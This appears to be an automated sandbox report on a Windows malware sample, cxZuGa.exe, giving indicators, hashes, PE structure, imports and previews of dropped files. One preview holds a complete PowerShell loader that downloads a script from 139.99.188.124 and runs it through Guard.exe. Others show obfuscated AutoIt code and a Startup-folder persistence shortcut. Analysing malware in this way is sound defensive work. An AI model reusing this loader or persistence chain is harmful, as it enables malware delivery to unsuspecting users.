• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:54:53 | API Interceptor | 57x Sleep call for process: powershell.exe modified
04:55:39 | API Interceptor | 2960x Sleep call for process: Guard.exe modified
04:55:57 | API Interceptor | 1914x Sleep call for process: SwiftWrite.pif modified
10:55:06 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Match | Associated Sample Name / URL | Detection | Threat Name | Context
139.99.188.124 | nTyPEbq9wQ.lnk | malicious | Unknown | 139.99.188.124/QWCheljD.txt
139.99.188.124 | 7A2lfjTYNf.lnk | malicious | Unknown | 139.99.188.124/VmnWBYrzn.txt
139.99.188.124 | 6fW0guYpsH.lnk | malicious | Unknown | 139.99.188.124/QWCheljD.txt
139.99.188.124 | R4qP4YM0QX.lnk | malicious | Unknown | 139.99.188.124/QWCheljD.txt
139.99.188.124 | R8CAg00Db8.lnk | malicious | Unknown | 139.99.188.124/QWCheljD.txt
139.99.188.124 | s4PymYGgSh.lnk | malicious | Unknown | 139.99.188.124/EsgMle.txt
139.99.188.124 | EO3RT0fEfb.exe | malicious | Unknown | 139.99.188.124/ucZfzm.txt
139.99.188.124 | RMBOriPHVJ.exe | malicious | Unknown | 139.99.188.124/mzmLv.txt
139.99.188.124 | S6x3K8vzCA.exe | malicious | Unknown | 139.99.188.124/wPBPjuY.txt
139.99.188.124 | PPbimZI4LV.exe | malicious | Unknown | 139.99.188.124/BlQMSgJx.txt
No context
No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\Public\Guard.exe | tzA45NGAW4.lnk | malicious | Unknown
C:\Users\Public\Guard.exe | TCKxnQ5CPn.exe | malicious | Unknown
C:\Users\Public\Guard.exe | n5Szx8qsFB.lnk | malicious | Unknown
C:\Users\Public\Guard.exe | nTyPEbq9wQ.lnk | malicious | Unknown
C:\Users\Public\Guard.exe | 7A2lfjTYNf.lnk | malicious | Unknown
C:\Users\Public\Guard.exe | 6fW0guYpsH.lnk | malicious | Unknown
C:\Users\Public\Guard.exe | FzmtNV0vnG.lnk | malicious | Unknown
C:\Users\Public\Guard.exe | lKin1m7Pf2.lnk | malicious | Unknown
C:\Users\Public\Guard.exe | R4qP4YM0QX.lnk | malicious | Unknown
C:\Users\Public\Guard.exe | R8CAg00Db8.lnk | malicious | Unknown
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 893608
Entropy (8bit): 6.62028134425878
Encrypted: false
SSDEEP: 12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5: 18CE19B57F43CE0A5AF149C96AECC685
SHA1: 1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256: D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512: A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:
• Filename: tzA45NGAW4.lnk, Detection: malicious
• Filename: TCKxnQ5CPn.exe, Detection: malicious
• Filename: n5Szx8qsFB.lnk, Detection: malicious
• Filename: nTyPEbq9wQ.lnk, Detection: malicious
• Filename: 7A2lfjTYNf.lnk, Detection: malicious
• Filename: 6fW0guYpsH.lnk, Detection: malicious
• Filename: FzmtNV0vnG.lnk, Detection: malicious
                                                          • Filename: lKin1m7Pf2.lnk, Detection: malicious, Browse
                                                          • Filename: R4qP4YM0QX.lnk, Detection: malicious, Browse
                                                          • Filename: R8CAg00Db8.lnk, Detection: malicious, Browse
                                                          Reputation:moderate, very likely benign file
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\cxZuGa.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):483
                                                          Entropy (8bit):5.277432583118796
                                                          Encrypted:false
                                                          SSDEEP:12:f73/o3FEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f73/QCknZ9LzjYnRSb8Cba
                                                          MD5:59445FB52E59565BFC7DCDAC3DC6794D
                                                          SHA1:D23671A061E5287E65B3421DBED2453B44046B01
                                                          SHA-256:24E61D47CE6243A53A0C964487F9F7C7919AFE6639873686945945BE1870241B
                                                          SHA-512:BF77D99E87A7EF4F2912528B4209FCCDA85A8AD90FEE38DEA5A3CA37616434448B1991F2AF8DC7926F71B5B811A76772BEAEDD4271FB1316D2781FEA15E48DCC
                                                          Malicious:true
                                                          Preview:[string]$fU5L = "http://139.99.188.124/kYCQj.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                          Category:dropped
                                                          Size (bytes):1245639
                                                          Entropy (8bit):5.141396699944807
                                                          Encrypted:false
                                                          SSDEEP:12288:28V+jcfSFQnlVOwPl19n0GJIGKvgW6X3YIUTtlnmo39FTtd:qcWQ1zJzQ3T7mo39t
                                                          MD5:49B77C2654D10A0285E01565FE3E0E7C
                                                          SHA1:CA864F6F60EF47B48EE8396FBCE3434B7023BFC8
                                                          SHA-256:1C725E077489EC594E58469A258127AF611A6F4F0792DF9045A21B64E6A49810
                                                          SHA-512:9FC606E901BE4F3BBDE92DE33105310E1522309B18CA72DFB97A1A71CF52A9BB9ED70ED68C5B6BB9D315C88657E740225A1275E19781587AF25564CD4B456B1F
                                                          Malicious:true
                                                          Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):0.34726597513537405
                                                          Encrypted:false
                                                          SSDEEP:3:Nlll:Nll
                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                          Malicious:false
                                                          Preview:@...e...........................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Users\Public\Guard.exe
                                                          File Type:ASCII text, with very long lines (1266)
                                                          Category:dropped
                                                          Size (bytes):1245636
                                                          Entropy (8bit):5.141356841387749
                                                          Encrypted:false
                                                          SSDEEP:12288:D8V+jcfSFQnlVOwPl19n0GJIGKvgW6X3YIUTtlnmo39FTtd:DcWQ1zJzQ3T7mo39t
                                                          MD5:F743A5AC42FF1580C8017446536489C7
                                                          SHA1:F7940706E14AF13B9F27429F0F4860D34F154545
                                                          SHA-256:EBB1AF9C34063B09754040D029EDB06CE178B33450F3E683FD9B8E2E17320AC2
                                                          SHA-512:D73989BE4C8E025EB55A9C57BB509E8F69996B3D705EC27CE81A1683B50F0EA48614DACC81DF91DE14E7AAFADF3026014A5D1667608EBB59D79D2CCAA8784238
                                                          Malicious:false
                                                          Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                          Process:C:\Users\Public\Guard.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):186
                                                          Entropy (8bit):4.7401751318145395
                                                          Encrypted:false
                                                          SSDEEP:3:RiMIpGXfeNH5E5wWAX+aJp6/h4EkD5yKXW/Zi+0/RaMl85uWAX+aJp6/h4EkD5yn:RiJbNHCwWDaJ0/hJkDrXW/Zz0tl8wWDH
                                                          MD5:633E34C077F6828A474217CE7DE57BED
                                                          SHA1:6C7EF480F22DE38D9EDF82EF35C4F5943540E164
                                                          SHA-256:FE9F225D70AC67046F622C2F52E17CB8CEDD111F51AEAA17C5ADBE48846E21AF
                                                          SHA-512:358C0EBBA88DA82FCDDE3D1C518C559DADBA02E7D5935A5D12BBC5D1463A8BA094FC2AD186CDE82316010E1C4C5E18C2314C4FED70DB433C39C8FF3015577995
                                                          Malicious:true
                                                          Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                          Process:C:\Users\Public\Guard.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):893608
                                                          Entropy (8bit):6.62028134425878
                                                          Encrypted:false
                                                          SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                          MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                          SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                          SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                          SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):99
                                                          Entropy (8bit):4.9306597478632
                                                          Encrypted:false
                                                          SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J5yKXW/Zi+URAAy:HRYF5yjo923yKXW/Zzyy
                                                          MD5:EF6AD112185745A629FB60A8A2678649
                                                          SHA1:500391A0E969362BFA1DFE7A116A9395E29D29DA
                                                          SHA-256:14555F0A16F710F533606B316DE7765634F60BD9FC5D1946D80EAA29104ACAF9
                                                          SHA-512:2F3E1A025E02EB111BB3E9F6E1CCEE3AD3A7A7BC90C0DF7D0C4ECD90BA7792A5D3C361113423BC9ED035FCA77EA5B9870AD1B648E1A86E717F7D29672699176D
                                                          Malicious:true
                                                          Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Entropy (8bit):6.306583416277578
                                                          TrID:
                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                          • DOS Executable Generic (2002/1) 0.92%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:cxZuGa.exe
                                                          File size:1'083'904 bytes
                                                          MD5:243e64fa2b25bba3e6c710de1bdd4b0c
                                                          SHA1:a5d90ba12791750258295c3601f55bc170badaa4
                                                          SHA256:cb284dd8a8bf729793df1cac357478c0bed3d011ae5f2b9223327ce9973f2172
                                                          SHA512:8cf227c0bf730b06476cdd35c45fa10388318c6761f3fe0dd1950c1b16eba59b18f4aa94e9c8124224648cfb1e3337d461ed597def53942da57e2949c008fa23
                                                          SSDEEP:24576:zrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaD15:z2EYTb8atv1orq+pEiSDTj1VyvBaJ
                                                          TLSH:FC357C4973A4419DFEABE1B6CA23C607D6B17C490276861F01A47B767F337712A2E321
                                                          File Content Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG.....>PG......PG......PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(..#PG."(..*PG."(...PG.+PF..RG..9I.{PG..9D.*PG..9..*PG
                                                          Icon Hash:0fd88dc89ea7861b
                                                          Entrypoint:0x14002549c
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x140000000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x67604A2C [Mon Dec 16 15:41:32 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:2
                                                          File Version Major:5
                                                          File Version Minor:2
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:2
                                                          Import Hash:fadc5a257419d2541a6b13dfb5e311e2
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe5c10 | 0x17c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfb000 | 0x14100 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xf4000 | 0x6f48 | .pdata |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x110000 | 0xa74 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc7050 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xd9aa0 | 0x28 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xc7070 | 0x100 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0xb5000 | 0x1138 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0xb3328 | 0xb3400 | 507a8505198e35cc9675301d53e3b1c4 | False | 0.5503358721234309 | data | 6.5212967575920215 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0xb5000 | 0x34204 | 0x34400 | 9eda36be0cf076085a2f9772c1ee5803 | False | 0.30884139503588515 | data | 5.360588077813426 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xea000 | 0x9120 | 0x5000 | ec6b77d6ef8898b0d3b7d48c042d66a0 | False | 0.040673828125 | DOS executable (block device driver) | 0.5749243362866429 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .pdata | 0xf4000 | 0x6f48 | 0x7000 | 4416e27f8be9f9271c439d2fd34d1b2d | False | 0.49612862723214285 | data | 5.911479421450324 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0xfb000 | 0x14100 | 0x14200 | 74faf2e67a4549158ddb7c6840305c71 | False | 0.19358986801242237 | data | 4.246532862729617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x110000 | 0xa74 | 0xc00 | 5ddb0e422ace102fe530e589a0cbec6f | False | 0.4850260416666667 | data | 5.139847116863034 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xfb458 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xfb580 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xfb6a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xfb7d0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/m | English | Great Britain | 0.14468236129184905 |
| RT_MENU | 0x10bff8 | 0x50 | data | English | Great Britain | 0.9 |
| RT_STRING | 0x10c048 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
| RT_STRING | 0x10c5dc | 0x68a | data | English | Great Britain | 0.2735961768219833 |
| RT_STRING | 0x10cc68 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
| RT_STRING | 0x10d0f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0x10d6f4 | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0x10dd50 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
| RT_STRING | 0x10e1b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
| RT_RCDATA | 0x10e310 | 0x8d4 | data | | | 1.0048672566371681 |
| RT_GROUP_ICON | 0x10ebe4 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x10ebf8 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x10ec0c | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0x10ec20 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0x10ec34 | 0xdc | data | English | Great Britain | 0.6181818181818182 |
| RT_MANIFEST | 0x10ed10 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |

| DLL | Import |
|---|---|
| WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect |
| VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW |
| WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
| COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
| MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W |
| WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable |
| PSAPI.DLL | GetProcessMemoryInfo |
| IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile |
| USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile |
| UxTheme.dll | IsThemeActive |
| KERNEL32.dll | WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, GetFullPathNameW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, EnterCriticalSection, DuplicateHandle, GetStdHandle, CreatePipe, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, CreateThread, GetCurrentProcess, GetCurrentThread, LeaveCriticalSection, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, TlsAlloc, ResetEvent, WaitForSingleObjectEx, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, CloseHandle, WriteConsoleW, MoveFileW, RtlCaptureContext |
| USER32.dll | GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetWindowLongW, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongPtrW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, SetWindowLongPtrW, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, IsCharUpperW, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, GetClipboardData, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, IsCharLowerW, IsCharAlphaNumericW, IsCharAlphaW, GetKeyboardLayoutNameW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, SetMenuDefaultItem, 